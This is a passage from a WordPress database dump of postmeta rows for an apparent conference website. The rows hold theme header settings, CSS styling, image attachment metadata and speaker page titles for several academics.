(13468,2798,'_dt_project_options_link_target',''),
(13469,2798,'_dt_project_options_link_name',''),
(13470,2798,'_dt_project_options_hide_thumbnail','1'),
(13471,2798,'_dt_project_options_open_thumbnail_in_lightbox','0'),
(13472,2798,'_dt_project_options_related_mode','same'),
(13473,2798,'_dt_project_options_preview','normal'),
(13474,2798,'the7_fancy_title_css','.fancy-header {\n  background-image: url(\'https://gsw2023.com/wp-content/uploads/2022/10/m1-2.jpg\');\n  background-repeat: no-repeat;\n  background-position: center center;\n  background-size: cover;\n  background-color: #222222;\n}\n.mobile-false .fancy-header {\n  background-attachment: scroll;\n}\n.fancy-header .wf-wrap {\n  min-height: 300px;\n  padding-top: 0px;\n  padding-bottom: 0px;\n}\n.fancy-header .fancy-title {\n  font-size: 30px;\n  line-height: 36px;\n  color: #ffffff;\n  text-transform: none;\n}\n.fancy-header .fancy-subtitle {\n  font-size: 18px;\n  line-height: 26px;\n  color: #ffffff;\n  text-transform: none;\n}\n.fancy-header .breadcrumbs {\n  color: #ffffff;\n}\n.fancy-header-overlay {\n  background: rgba(0,0,0,0.5);\n}\n@media screen and (max-width: 778px) {\n  .fancy-header .wf-wrap {\n    min-height: 70px;\n  }\n  .fancy-header .fancy-title {\n    font-size: 30px;\n    line-height: 38px;\n  }\n  .fancy-header .fancy-subtitle {\n    font-size: 20px;\n    line-height: 28px;\n  }\n  .fancy-header.breadcrumbs-mobile-off .breadcrumbs {\n    display: none;\n  }\n  #fancy-header > .wf-wrap {\n    flex-flow: column wrap;\n    align-items: center;\n    justify-content: center;\n    padding-bottom: 0px !important;\n  }\n  .fancy-header.title-left .breadcrumbs {\n    text-align: center;\n    float: none;\n  }\n  .breadcrumbs {\n    margin-bottom: 10px;\n  }\n  .breadcrumbs.breadcrumbs-bg {\n    margin-top: 10px;\n  }\n  .fancy-header.title-right .breadcrumbs {\n    margin: 10px 0 10px 0;\n  }\n  #fancy-header .hgroup,\n  #fancy-header .breadcrumbs {\n    text-align: center;\n  }\n  .fancy-header .hgroup {\n    padding-bottom: 5px;\n  }\n  .breadcrumbs-off .hgroup {\n    padding-bottom: 5px;\n  }\n  .title-right .hgroup {\n    padding: 0 0 5px 0;\n  }\n  .title-right.breadcrumbs-off .hgroup {\n    padding-top: 5px;\n  }\n  .title-left.disabled-bg .breadcrumbs {\n    margin-bottom: 0;\n  }\n}\n'),
(13475,2798,'_thumbnail_id','2799'),
(13476,2802,'_wp_attached_file','2022/10/m2.jpg'),
(13477,2802,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:392;s:6:\"height\";i:201;s:4:\"file\";s:14:\"2022/10/m2.jpg\";s:8:\"filesize\";i:114069;s:5:\"sizes\";a:2:{s:6:\"medium\";a:5:{s:4:\"file\";s:14:\"m2-300x154.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:154;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:16466;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:14:\"m2-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:7976;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(13478,2803,'_wp_attached_file','2022/10/m3.jpg'),
(13479,2803,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:397;s:6:\"height\";i:190;s:4:\"file\";s:14:\"2022/10/m3.jpg\";s:8:\"filesize\";i:64266;s:5:\"sizes\";a:2:{s:6:\"medium\";a:5:{s:4:\"file\";s:14:\"m3-300x144.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:144;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:9606;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:14:\"m3-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:6286;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(13480,2805,'_wp_attached_file','2022/10/m4.jpg'),
(13481,2805,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:374;s:6:\"height\";i:225;s:4:\"file\";s:14:\"2022/10/m4.jpg\";s:8:\"filesize\";i:51082;s:5:\"sizes\";a:2:{s:6:\"medium\";a:5:{s:4:\"file\";s:14:\"m4-300x180.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:180;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:8478;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:14:\"m4-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:6198;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(13482,2808,'_edit_lock','1665766041:1'),
(13483,2705,'rs_page_bg_color',''),
(13485,2487,'rs_page_bg_color',''),
(13486,2809,'_wp_attached_file','2022/10/w122.jpg'),
(13487,2809,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:138;s:6:\"height\";i:150;s:4:\"file\";s:16:\"2022/10/w122.jpg\";s:8:\"filesize\";i:30709;s:5:\"sizes\";a:0:{}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(13488,2808,'_thumbnail_id','2809'),
(13489,2808,'_edit_last','1'),
(13490,2808,'_dt_sidebar_position','disabled'),
(13491,2808,'_dt_sidebar_widgetarea_id','sidebar_1'),
(13492,2808,'_dt_sidebar_hide_on_mobile','0'),
(13493,2808,'_dt_footer_show','1'),
(13494,2808,'_dt_footer_widgetarea_id','sidebar_2'),
(13495,2808,'_dt_footer_hide_on_mobile','0'),
(13496,2808,'_dt_header_title','fancy'),
(13497,2808,'_dt_header_background','normal'),
(13498,2808,'_dt_header_background_below_slideshow','disabled'),
(13499,2808,'_dt_header_transparent_bg_color_scheme','light'),
(13500,2808,'_dt_header_transparent_top_bar_bg_color','#ffffff'),
(13501,2808,'_dt_header_transparent_top_bar_bg_opacity','25'),
(13502,2808,'_dt_header_transparent_bg_color','#000000'),
(13503,2808,'_dt_header_transparent_bg_opacity','50'),
(13504,2808,'_dt_header_disabled_background','normal'),
(13505,2808,'_dt_header_disabled_transparent_bg_color_scheme','light'),
(13506,2808,'_dt_header_disabled_transparent_top_bar_bg_color','#ffffff'),
(13507,2808,'_dt_header_disabled_transparent_top_bar_bg_opacity','25'),
(13508,2808,'_dt_header_disabled_transparent_bg_color','#000000'),
(13509,2808,'_dt_header_disabled_transparent_bg_opacity','50'),
(13510,2808,'_dt_page_overrides_top_margin',''),
(13511,2808,'_dt_page_overrides_right_margin',''),
(13512,2808,'_dt_page_overrides_bottom_margin',''),
(13513,2808,'_dt_page_overrides_left_margin',''),
(13514,2808,'_dt_mobile_page_padding_top',''),
(13515,2808,'_dt_mobile_page_padding_right',''),
(13516,2808,'_dt_mobile_page_padding_bottom',''),
(13517,2808,'_dt_mobile_page_padding_left',''),
(13518,2808,'_dt_fancy_header_layout_heading',''),
(13519,2808,'_dt_fancy_header_title_aligment','center'),
(13520,2808,'_dt_fancy_header_height','300'),
(13521,2808,'_dt_fancy_header_padding-top','0px'),
(13522,2808,'_dt_fancy_header_padding-bottom','0px'),
(13523,2808,'_dt_fancy_header_breadcrumbs_heading',''),
(13524,2808,'_dt_fancy_header_breadcrumbs','disabled'),
(13525,2808,'_dt_fancy_header_breadcrumbs_text_color','#ffffff'),
(13526,2808,'_dt_fancy_header_breadcrumbs_bg_color','disabled'),
(13527,2808,'_dt_fancy_header_title_heading',''),
(13528,2808,'_dt_fancy_header_title_mode','custom'),
(13529,2808,'_dt_fancy_header_title','Prof. Maria Antonia Brovelli, Politecnico di Milano, Italy (TC IV)'),
(13530,2808,'_dt_fancy_header_title_font_size','30'),
(13531,2808,'_dt_fancy_header_title_line_height','36'),
(13532,2808,'_dt_fancy_header_text_transform','none'),
(13533,2808,'_dt_fancy_header_title_color_mode','color'),
(13534,2808,'_dt_fancy_header_title_color','#ffffff'),
(13535,2808,'_dt_fancy_header_subtitle_heading',''),
(13536,2808,'_dt_fancy_header_subtitle',''),
(13537,2808,'_dt_fancy_header_subtitle_font_size','18'),
(13538,2808,'_dt_fancy_header_subtitle_line_height','26'),
(13539,2808,'_dt_fancy_header_subtitle_text_transform','none'),
(13540,2808,'_dt_fancy_header_subtitle_color_mode','color'),
(13541,2808,'_dt_fancy_header_subtitle_color','#ffffff'),
(13542,2808,'_dt_fancy_header_bg_heading',''),
(13543,2808,'_dt_fancy_header_bg_color','#222222'),
(13544,2808,'_dt_fancy_header_bg_image_origin','custom'),
(13545,2808,'_dt_fancy_header_bg_image','a:0:{}'),
(13546,2808,'_dt_fancy_header_bg_repeat','no-repeat'),
(13547,2808,'_dt_fancy_header_bg_position_x','center'),
(13548,2808,'_dt_fancy_header_bg_position_y','center'),
(13549,2808,'_dt_fancy_header_bg_fullscreen','1'),
(13550,2808,'_dt_fancy_header_bg_overlay','0'),
(13551,2808,'_dt_fancy_header_overlay_color','#000'),
(13552,2808,'_dt_fancy_header_bg_overlay_opacity','50'),
(13553,2808,'_dt_fancy_header_scroll_effect','default'),
(13554,2808,'_dt_fancy_header_bg_parallax','0.5'),
(13555,2808,'_dt_fancy_header_responsiveness_heading',''),
(13556,2808,'_dt_fancy_header_responsiveness','enabled'),
(13557,2808,'_dt_fancy_header_responsiveness_switch','778px'),
(13558,2808,'_dt_fancy_header_responsive_height','70'),
(13559,2808,'_dt_fancy_header_responsive_font_size','30'),
(13560,2808,'_dt_fancy_header_responsive_title_line_height','38'),
(13561,2808,'_dt_fancy_header_responsive_subtitle_font_size','20'),
(13562,2808,'_dt_fancy_header_responsive_subtitle_line_height','28'),
(13563,2808,'_dt_fancy_header_responsive_breadcrumbs','disabled'),
(13564,2808,'_dt_teammate_options_go_to_single','1'),
(13565,2808,'_dt_teammate_options_position',''),
(13566,2808,'_dt_teammate_options_website',''),
(13567,2808,'_dt_teammate_options_mail',''),
(13568,2808,'_dt_teammate_options_facebook',''),
(13569,2808,'_dt_teammate_options_twitter',''),
(13570,2808,'_dt_teammate_options_dribbble',''),
(13571,2808,'_dt_teammate_options_you-tube',''),
(13572,2808,'_dt_teammate_options_rss',''),
(13573,2808,'_dt_teammate_options_delicious',''),
(13574,2808,'_dt_teammate_options_flickr',''),
(13575,2808,'_dt_teammate_options_lastfm',''),
(13576,2808,'_dt_teammate_options_linkedin',''),
(13577,2808,'_dt_teammate_options_vimeo',''),
(13578,2808,'_dt_teammate_options_tumbler',''),
(13579,2808,'_dt_teammate_options_pinterest',''),
(13580,2808,'_dt_teammate_options_devian',''),
(13581,2808,'_dt_teammate_options_skype',''),
(13582,2808,'_dt_teammate_options_github',''),
(13583,2808,'_dt_teammate_options_instagram',''),
(13584,2808,'_dt_teammate_options_stumbleupon',''),
(13585,2808,'_dt_teammate_options_behance',''),
(13586,2808,'_dt_teammate_options_px-500',''),
(13587,2808,'_dt_teammate_options_tripedvisor',''),
(13588,2808,'_dt_teammate_options_vk',''),
(13589,2808,'_dt_teammate_options_foursquare',''),
(13590,2808,'_dt_teammate_options_xing',''),
(13591,2808,'_dt_teammate_options_weibo',''),
(13592,2808,'_dt_teammate_options_odnoklassniki',''),
(13593,2808,'_dt_teammate_options_research-gate',''),
(13594,2808,'_dt_teammate_options_yelp',''),
(13595,2808,'_dt_teammate_options_blogger',''),
(13596,2808,'_dt_teammate_options_soundcloud',''),
(13597,2808,'_dt_teammate_options_viber',''),
(13598,2808,'_dt_teammate_options_whatsapp',''),
(13599,2808,'_dt_teammate_options_reddit',''),
(13600,2808,'_dt_teammate_options_snapchat',''),
(13601,2808,'_dt_teammate_options_telegram',''),
(13602,2808,'the7_fancy_title_css','.fancy-header {\n  background-image: none;\n  background-repeat: no-repeat;\n  background-position: center center;\n  background-size: cover;\n  background-color: #222222;\n}\n.mobile-false .fancy-header {\n  background-attachment: scroll;\n}\n.fancy-header .wf-wrap {\n  min-height: 300px;\n  padding-top: 0px;\n  padding-bottom: 0px;\n}\n.fancy-header .fancy-title {\n  font-size: 30px;\n  line-height: 36px;\n  color: #ffffff;\n  text-transform: none;\n}\n.fancy-header .fancy-subtitle {\n  font-size: 18px;\n  line-height: 26px;\n  color: #ffffff;\n  text-transform: none;\n}\n.fancy-header .breadcrumbs {\n  color: #ffffff;\n}\n.fancy-header-overlay {\n  background: rgba(0,0,0,0.5);\n}\n@media screen and (max-width: 778px) {\n  .fancy-header .wf-wrap {\n    min-height: 70px;\n  }\n  .fancy-header .fancy-title {\n    font-size: 30px;\n    line-height: 38px;\n  }\n  .fancy-header .fancy-subtitle {\n    font-size: 20px;\n    line-height: 28px;\n  }\n  .fancy-header.breadcrumbs-mobile-off .breadcrumbs {\n    display: none;\n  }\n  #fancy-header > .wf-wrap {\n    flex-flow: column wrap;\n    align-items: center;\n    justify-content: center;\n    padding-bottom: 0px !important;\n  }\n  .fancy-header.title-left .breadcrumbs {\n    text-align: center;\n    float: none;\n  }\n  .breadcrumbs {\n    margin-bottom: 10px;\n  }\n  .breadcrumbs.breadcrumbs-bg {\n    margin-top: 10px;\n  }\n  .fancy-header.title-right .breadcrumbs {\n    margin: 10px 0 10px 0;\n  }\n  #fancy-header .hgroup,\n  #fancy-header .breadcrumbs {\n    text-align: center;\n  }\n  .fancy-header .hgroup {\n    padding-bottom: 5px;\n  }\n  .breadcrumbs-off .hgroup {\n    padding-bottom: 5px;\n  }\n  .title-right .hgroup {\n    padding: 0 0 5px 0;\n  }\n  .title-right.breadcrumbs-off .hgroup {\n    padding-top: 5px;\n  }\n  .title-left.disabled-bg .breadcrumbs {\n    margin-bottom: 0;\n  }\n}\n'),
(13603,2810,'_edit_lock','1665767355:1'),
(13604,2810,'_edit_last','1'),
(13605,2810,'_dt_sidebar_position','disabled'),
(13606,2810,'_dt_sidebar_widgetarea_id','sidebar_1'),
(13607,2810,'_dt_sidebar_hide_on_mobile','0'),
(13608,2810,'_dt_footer_show','1'),
(13609,2810,'_dt_footer_widgetarea_id','sidebar_2'),
(13610,2810,'_dt_footer_hide_on_mobile','0'),
(13611,2810,'_dt_header_title','fancy'),
(13612,2810,'_dt_header_background','normal'),
(13613,2810,'_dt_header_background_below_slideshow','disabled'),
(13614,2810,'_dt_header_transparent_bg_color_scheme','light'),
(13615,2810,'_dt_header_transparent_top_bar_bg_color','#ffffff'),
(13616,2810,'_dt_header_transparent_top_bar_bg_opacity','25'),
(13617,2810,'_dt_header_transparent_bg_color','#000000'),
(13618,2810,'_dt_header_transparent_bg_opacity','50'),
(13619,2810,'_dt_header_disabled_background','normal'),
(13620,2810,'_dt_header_disabled_transparent_bg_color_scheme','light'),
(13621,2810,'_dt_header_disabled_transparent_top_bar_bg_color','#ffffff'),
(13622,2810,'_dt_header_disabled_transparent_top_bar_bg_opacity','25'),
(13623,2810,'_dt_header_disabled_transparent_bg_color','#000000'),
(13624,2810,'_dt_header_disabled_transparent_bg_opacity','50'),
(13625,2810,'_dt_page_overrides_top_margin',''),
(13626,2810,'_dt_page_overrides_right_margin',''),
(13627,2810,'_dt_page_overrides_bottom_margin',''),
(13628,2810,'_dt_page_overrides_left_margin',''),
(13629,2810,'_dt_mobile_page_padding_top',''),
(13630,2810,'_dt_mobile_page_padding_right',''),
(13631,2810,'_dt_mobile_page_padding_bottom',''),
(13632,2810,'_dt_mobile_page_padding_left',''),
(13633,2810,'_dt_fancy_header_layout_heading',''),
(13634,2810,'_dt_fancy_header_title_aligment','center'),
(13635,2810,'_dt_fancy_header_height','300'),
(13636,2810,'_dt_fancy_header_padding-top','0px'),
(13637,2810,'_dt_fancy_header_padding-bottom','0px'),
(13638,2810,'_dt_fancy_header_breadcrumbs_heading',''),
(13639,2810,'_dt_fancy_header_breadcrumbs','disabled'),
(13640,2810,'_dt_fancy_header_breadcrumbs_text_color','#ffffff'),
(13641,2810,'_dt_fancy_header_breadcrumbs_bg_color','disabled'),
(13642,2810,'_dt_fancy_header_title_heading',''),
(13643,2810,'_dt_fancy_header_title_mode','custom'),
(13644,2810,'_dt_fancy_header_title','Dr. Hao Wu, National Geomatics Center of China (TC IV)'),
(13645,2810,'_dt_fancy_header_title_font_size','30'),
(13646,2810,'_dt_fancy_header_title_line_height','36'),
(13647,2810,'_dt_fancy_header_text_transform','none'),
(13648,2810,'_dt_fancy_header_title_color_mode','color'),
(13649,2810,'_dt_fancy_header_title_color','#ffffff'),
(13650,2810,'_dt_fancy_header_subtitle_heading',''),
(13651,2810,'_dt_fancy_header_subtitle',''),
(13652,2810,'_dt_fancy_header_subtitle_font_size','18'),
(13653,2810,'_dt_fancy_header_subtitle_line_height','26'),
(13654,2810,'_dt_fancy_header_subtitle_text_transform','none'),
(13655,2810,'_dt_fancy_header_subtitle_color_mode','color'),
(13656,2810,'_dt_fancy_header_subtitle_color','#ffffff'),
(13657,2810,'_dt_fancy_header_bg_heading',''),
(13658,2810,'_dt_fancy_header_bg_color','#222222'),
(13659,2810,'_dt_fancy_header_bg_image_origin','custom'),
(13660,2810,'_dt_fancy_header_bg_image','a:0:{}'),
(13661,2810,'_dt_fancy_header_bg_repeat','no-repeat'),
(13662,2810,'_dt_fancy_header_bg_position_x','center'),
(13663,2810,'_dt_fancy_header_bg_position_y','center'),
(13664,2810,'_dt_fancy_header_bg_fullscreen','1'),
(13665,2810,'_dt_fancy_header_bg_overlay','0'),
(13666,2810,'_dt_fancy_header_overlay_color','#000'),
(13667,2810,'_dt_fancy_header_bg_overlay_opacity','50'),
(13668,2810,'_dt_fancy_header_scroll_effect','default'),
(13669,2810,'_dt_fancy_header_bg_parallax','0.5'),
(13670,2810,'_dt_fancy_header_responsiveness_heading',''),
(13671,2810,'_dt_fancy_header_responsiveness','enabled'),
(13672,2810,'_dt_fancy_header_responsiveness_switch','778px'),
(13673,2810,'_dt_fancy_header_responsive_height','70'),
(13674,2810,'_dt_fancy_header_responsive_font_size','30'),
(13675,2810,'_dt_fancy_header_responsive_title_line_height','38'),
(13676,2810,'_dt_fancy_header_responsive_subtitle_font_size','20'),
(13677,2810,'_dt_fancy_header_responsive_subtitle_line_height','28'),
(13678,2810,'_dt_fancy_header_responsive_breadcrumbs','disabled'),
(13679,2810,'_dt_teammate_options_go_to_single','1'),
(13680,2810,'_dt_teammate_options_position',''),
(13681,2810,'_dt_teammate_options_website',''),
(13682,2810,'_dt_teammate_options_mail',''),
(13683,2810,'_dt_teammate_options_facebook',''),
(13684,2810,'_dt_teammate_options_twitter',''),
(13685,2810,'_dt_teammate_options_dribbble',''),
(13686,2810,'_dt_teammate_options_you-tube',''),
(13687,2810,'_dt_teammate_options_rss',''),
(13688,2810,'_dt_teammate_options_delicious',''),
(13689,2810,'_dt_teammate_options_flickr',''),
(13690,2810,'_dt_teammate_options_lastfm',''),
(13691,2810,'_dt_teammate_options_linkedin',''),
(13692,2810,'_dt_teammate_options_vimeo',''),
(13693,2810,'_dt_teammate_options_tumbler',''),
(13694,2810,'_dt_teammate_options_pinterest',''),
(13695,2810,'_dt_teammate_options_devian',''),
(13696,2810,'_dt_teammate_options_skype',''),
(13697,2810,'_dt_teammate_options_github',''),
(13698,2810,'_dt_teammate_options_instagram',''),
(13699,2810,'_dt_teammate_options_stumbleupon',''),
(13700,2810,'_dt_teammate_options_behance',''),
(13701,2810,'_dt_teammate_options_px-500',''),
(13702,2810,'_dt_teammate_options_tripedvisor',''),
(13703,2810,'_dt_teammate_options_vk',''),
(13704,2810,'_dt_teammate_options_foursquare',''),
(13705,2810,'_dt_teammate_options_xing',''),
(13706,2810,'_dt_teammate_options_weibo',''),
(13707,2810,'_dt_teammate_options_odnoklassniki',''),
(13708,2810,'_dt_teammate_options_research-gate',''),
(13709,2810,'_dt_teammate_options_yelp',''),
(13710,2810,'_dt_teammate_options_blogger',''),
(13711,2810,'_dt_teammate_options_soundcloud',''),
(13712,2810,'_dt_teammate_options_viber',''),
(13713,2810,'_dt_teammate_options_whatsapp',''),
(13714,2810,'_dt_teammate_options_reddit',''),
(13715,2810,'_dt_teammate_options_snapchat',''),
(13716,2810,'_dt_teammate_options_telegram',''),
(13717,2810,'the7_fancy_title_css','.fancy-header {\n  background-image: none;\n  background-repeat: no-repeat;\n  background-position: center center;\n  background-size: cover;\n  background-color: #222222;\n}\n.mobile-false .fancy-header {\n  background-attachment: scroll;\n}\n.fancy-header .wf-wrap {\n  min-height: 300px;\n  padding-top: 0px;\n  padding-bottom: 0px;\n}\n.fancy-header .fancy-title {\n  font-size: 30px;\n  line-height: 36px;\n  color: #ffffff;\n  text-transform: none;\n}\n.fancy-header .fancy-subtitle {\n  font-size: 18px;\n  line-height: 26px;\n  color: #ffffff;\n  text-transform: none;\n}\n.fancy-header .breadcrumbs {\n  color: #ffffff;\n}\n.fancy-header-overlay {\n  background: rgba(0,0,0,0.5);\n}\n@media screen and (max-width: 778px) {\n  .fancy-header .wf-wrap {\n    min-height: 70px;\n  }\n  .fancy-header .fancy-title {\n    font-size: 30px;\n    line-height: 38px;\n  }\n  .fancy-header .fancy-subtitle {\n    font-size: 20px;\n    line-height: 28px;\n  }\n  .fancy-header.breadcrumbs-mobile-off .breadcrumbs {\n    display: none;\n  }\n  #fancy-header > .wf-wrap {\n    flex-flow: column wrap;\n    align-items: center;\n    justify-content: center;\n    padding-bottom: 0px !important;\n  }\n  .fancy-header.title-left .breadcrumbs {\n    text-align: center;\n    float: none;\n  }\n  .breadcrumbs {\n    margin-bottom: 10px;\n  }\n  .breadcrumbs.breadcrumbs-bg {\n    margin-top: 10px;\n  }\n  .fancy-header.title-right .breadcrumbs {\n    margin: 10px 0 10px 0;\n  }\n  #fancy-header .hgroup,\n  #fancy-header .breadcrumbs {\n    text-align: center;\n  }\n  .fancy-header .hgroup {\n    padding-bottom: 5px;\n  }\n  .breadcrumbs-off .hgroup {\n    padding-bottom: 5px;\n  }\n  .title-right .hgroup {\n    padding: 0 0 5px 0;\n  }\n  .title-right.breadcrumbs-off .hgroup {\n    padding-top: 5px;\n  }\n  .title-left.disabled-bg .breadcrumbs {\n    margin-bottom: 0;\n  }\n}\n'),
(13718,2808,'rs_page_bg_color',''),
(13720,2814,'_wp_attached_file','2022/10/w123.jpg'),
(13721,2814,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:137;s:6:\"height\";i:160;s:4:\"file\";s:16:\"2022/10/w123.jpg\";s:8:\"filesize\";i:29213;s:5:\"sizes\";a:1:{s:9:\"thumbnail\";a:5:{s:4:\"file\";s:16:\"w123-137x150.jpg\";s:5:\"width\";i:137;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:4880;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(13722,2810,'_thumbnail_id','2814'),
(13723,2816,'_wp_attached_file','2022/10/m2-1.jpg'),
(13724,2816,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:239;s:6:\"height\";i:149;s:4:\"file\";s:16:\"2022/10/m2-1.jpg\";s:8:\"filesize\";i:66175;s:5:\"sizes\";a:1:{s:9:\"thumbnail\";a:5:{s:4:\"file\";s:16:\"m2-1-150x149.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:149;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:9378;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(13725,2818,'_edit_lock','1665767355:1'),
(13726,2819,'_wp_attached_file','2022/10/w131.jpg'),
(13727,2819,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:111;s:6:\"height\";i:135;s:4:\"file\";s:16:\"2022/10/w131.jpg\";s:8:\"filesize\";i:34037;s:5:\"sizes\";a:0:{}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(13728,2818,'_thumbnail_id','2819'),
(13729,2818,'_edit_last','1'),
(13730,2818,'_dt_sidebar_position','disabled'),
(13731,2818,'_dt_sidebar_widgetarea_id','sidebar_1'),
(13732,2818,'_dt_sidebar_hide_on_mobile','0'),
(13733,2818,'_dt_footer_show','1'),
(13734,2818,'_dt_footer_widgetarea_id','sidebar_2'),
(13735,2818,'_dt_footer_hide_on_mobile','0'),
(13736,2818,'_dt_header_title','fancy'),
(13737,2818,'_dt_header_background','normal'),
(13738,2818,'_dt_header_background_below_slideshow','disabled'),
(13739,2818,'_dt_header_transparent_bg_color_scheme','light'),
(13740,2818,'_dt_header_transparent_top_bar_bg_color','#ffffff'),
(13741,2818,'_dt_header_transparent_top_bar_bg_opacity','25'),
(13742,2818,'_dt_header_transparent_bg_color','#000000'),
(13743,2818,'_dt_header_transparent_bg_opacity','50'),
(13744,2818,'_dt_header_disabled_background','normal'),
(13745,2818,'_dt_header_disabled_transparent_bg_color_scheme','light'),
(13746,2818,'_dt_header_disabled_transparent_top_bar_bg_color','#ffffff'),
(13747,2818,'_dt_header_disabled_transparent_top_bar_bg_opacity','25'),
(13748,2818,'_dt_header_disabled_transparent_bg_color','#000000'),
(13749,2818,'_dt_header_disabled_transparent_bg_opacity','50'),
(13750,2818,'_dt_page_overrides_top_margin',''),
(13751,2818,'_dt_page_overrides_right_margin',''),
(13752,2818,'_dt_page_overrides_bottom_margin',''),
(13753,2818,'_dt_page_overrides_left_margin',''),
(13754,2818,'_dt_mobile_page_padding_top',''),
(13755,2818,'_dt_mobile_page_padding_right',''),
(13756,2818,'_dt_mobile_page_padding_bottom',''),
(13757,2818,'_dt_mobile_page_padding_left',''),
(13758,2818,'_dt_fancy_header_layout_heading',''),
(13759,2818,'_dt_fancy_header_title_aligment','center'),
(13760,2818,'_dt_fancy_header_height','300'),
(13761,2818,'_dt_fancy_header_padding-top','0px'),
(13762,2818,'_dt_fancy_header_padding-bottom','0px'),
(13763,2818,'_dt_fancy_header_breadcrumbs_heading',''),
(13764,2818,'_dt_fancy_header_breadcrumbs','disabled'),
(13765,2818,'_dt_fancy_header_breadcrumbs_text_color','#ffffff'),
(13766,2818,'_dt_fancy_header_breadcrumbs_bg_color','disabled'),
(13767,2818,'_dt_fancy_header_title_heading',''),
(13768,2818,'_dt_fancy_header_title_mode','custom'),
(13769,2818,'_dt_fancy_header_title','Prof. Wei Huang Tongji University, China (WG IV/6)'),
(13770,2818,'_dt_fancy_header_title_font_size','30'),
(13771,2818,'_dt_fancy_header_title_line_height','36'),
(13772,2818,'_dt_fancy_header_text_transform','none'),
(13773,2818,'_dt_fancy_header_title_color_mode','color'),
(13774,2818,'_dt_fancy_header_title_color','#ffffff'),
(13775,2818,'_dt_fancy_header_subtitle_heading',''),
(13776,2818,'_dt_fancy_header_subtitle',''),
(13777,2818,'_dt_fancy_header_subtitle_font_size','18'),
